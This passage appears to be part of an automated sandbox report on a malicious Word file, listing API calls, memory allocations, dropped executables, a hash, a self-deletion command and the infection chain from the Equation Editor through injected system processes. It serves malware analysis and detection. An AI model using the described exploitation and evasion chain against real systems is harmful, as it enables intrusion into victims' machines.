          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004047EE4_2_004047EE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004060834_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C02765_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C1A6F5_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C4CC45_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009BAC145_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C2D975_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C0D535_2_009C0D53
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C36595_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B5FCE5_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C07E15_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0A645_2_000F0A64
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_004010266_2_00401026
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E2616_2_0041E261
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EB716_2_0041EB71
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E3DA6_2_0041E3DA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E4B46_2_0041E4B4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E4B6_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E506_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB56_2_0041EEB5
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D7DE6_2_0041D7DE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E79A6_2_0041E79A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C02766_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C1A6F6_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C4CC46_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009BAC146_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C2D976_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C0D536_2_009C0D53
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C36596_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B5FCE6_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009C07E16_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0E0C66_2_00A0E0C6
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A3D0056_2_00A3D005
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A130406_2_00A13040
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A2905A6_2_00A2905A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0E2E96_2_00A0E2E9
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00AB12386_2_00AB1238
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00AB63BF6_2_00AB63BF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0F3CF6_2_00A0F3CF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A363DB6_2_00A363DB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A123056_2_00A12305
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A5A37B6_2_00A5A37B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A173536_2_00A17353
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A454856_2_00A45485
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A214896_2_00A21489
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A9443E6_2_00A9443E
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A4D47D6_2_00A4D47D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A2C5F06_2_00A2C5F0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A1351F6_2_00A1351F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A565406_2_00A56540
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A146806_2_00A14680
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A1E6C16_2_00A1E6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_020112388_2_02011238
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6E0C68_2_01F6E0C6
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8905A8_2_01F8905A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F730408_2_01F73040
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9D0058_2_01F9D005
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F963DB8_2_01F963DB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6F3CF8_2_01F6F3CF
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FBA37B8_2_01FBA37B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F773538_2_01F77353
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F723058_2_01F72305
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6E2E98_2_01F6E2E9
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8C5F08_2_01F8C5F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_020126228_2_02012622
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7351F8_2_01F7351F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F814898_2_01F81489
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA54858_2_01FA5485
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA57C38_2_01FA57C3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C7BC8_2_01F7C7BC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF579A8_2_01FF579A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7E6C18_2_01F7E6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F746808_2_01F74680
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F869FE8_2_01F869FE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F729B28_2_01F729B2
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_02023A838_2_02023A83
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF59558_2_01FF5955
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9286D8_2_01F9286D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201CBA48_2_0201CBA4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C85C8_2_01F7C85C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FFDBDA8_2_01FFDBDA
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200F8EE8_2_0200F8EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F97B008_2_01F97B00
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201098E8_2_0201098E
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7CD5B8_2_01F7CD5B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA0D3B8_2_01FA0D3B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9DF7C8_2_01F9DF7C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F80F3F8_2_01F80F3F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8EE4C8_2_01F8EE4C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA2E2F8_2_01FA2E2F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200FDDD8_2_0200FDDD
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE79A8_2_000AE79A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD7DE8_2_000AD7DE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEB718_2_000AEB71
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092D908_2_00092D90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E4B8_2_00099E4B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E508_2_00099E50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB58_2_000AEEB5
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092FB08_2_00092FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009B2233 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A0DF5C appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A53F92 appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A5373B appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009AF1E0 appears 48 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FDF970 appears 81 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB373B appears 238 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB3F92 appears 108 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A350 NtCreateFile,6_2_0041A350
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A400 NtReadFile,6_2_0041A400
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A480 NtClose,6_2_0041A480
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,6_2_0041A530
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A34A NtCreateFile,6_2_0041A34A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A3FB NtReadFile,6_2_0041A3FB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A47B NtClose,6_2_0041A47B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,6_2_00A000C4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,6_2_00A00078
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00A00048
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,6_2_009FF9F0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,6_2_009FF900
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_009FFAD0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_009FFAE8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_009FFBB8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_009FFB68
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_009FFC90
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_009FFC60
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,6_2_009FFD8C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_009FFDC0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_009FFEA0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_009FFED0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,6_2_009FFFB4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A010D0 NtOpenProcessToken,6_2_00A010D0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00060 NtQuerySection,6_2_00A00060
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A001D4 NtSetValueKey,6_2_00A001D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0010C NtOpenDirectoryObject,6_2_00A0010C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A01148 NtOpenThread,6_2_00A01148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk,8_2_01F600C4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk,8_2_01F607AC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk,8_2_01F5F9F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk,8_2_01F5F900
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_01F5FBB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01F5FB68
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk,8_2_01F5FB50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_01F5FAE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_01F5FAD0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk,8_2_01F5FAB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01F5FDC0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk,8_2_01F5FD8C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_01F5FC60
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk,8_2_01F5FFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_01F5FED0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F601D4 NtSetValueKey,8_2_01F601D4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61148 NtOpenThread,8_2_01F61148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6010C NtOpenDirectoryObject,8_2_01F6010C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F610D0 NtOpenProcessToken,8_2_01F610D0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60078 NtResumeThread,8_2_01F60078
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60060 NtQuerySection,8_2_01F60060
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60048 NtProtectVirtualMemory,8_2_01F60048
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61930 NtSetContextThread,8_2_01F61930
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F938 NtWriteFile,8_2_01F5F938
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F8CC NtWaitForSingleObject,8_2_01F5F8CC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBE8 NtQueryVirtualMemory,8_2_01F5FBE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA50 NtEnumerateValueKey,8_2_01F5FA50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA20 NtQueryInformationFile,8_2_01F5FA20
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61D80 NtSuspendThread,8_2_01F61D80
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD5C NtEnumerateKey,8_2_01F5FD5C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC90 NtUnmapViewOfSection,8_2_01F5FC90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60C40 NtGetContextThread,8_2_01F60C40
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC48 NtSetInformationFile,8_2_01F5FC48
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC30 NtOpenProcess,8_2_01F5FC30
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFFC NtCreateProcessEx,8_2_01F5FFFC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FF34 NtQueueApcThread,8_2_01F5FF34
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FEA0 NtReadVirtualMemory,8_2_01F5FEA0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FE24 NtWriteVirtualMemory,8_2_01F5FE24
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA350 NtCreateFile,8_2_000AA350
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA400 NtReadFile,8_2_000AA400
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA480 NtClose,8_2_000AA480
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA530 NtAllocateVirtualMemory,8_2_000AA530
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA34A NtCreateFile,8_2_000AA34A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA3FB NtReadFile,8_2_000AA3FB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA47B NtClose,8_2_000AA47B
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: Revised RFQ-PO180911.docVirustotal: Detection: 31%
          Source: Revised RFQ-PO180911.docReversingLabs: Detection: 32%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfwJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfwJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vised RFQ-PO180911.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6029.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@11/14@5/3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar,4_2_00402078
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404333
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
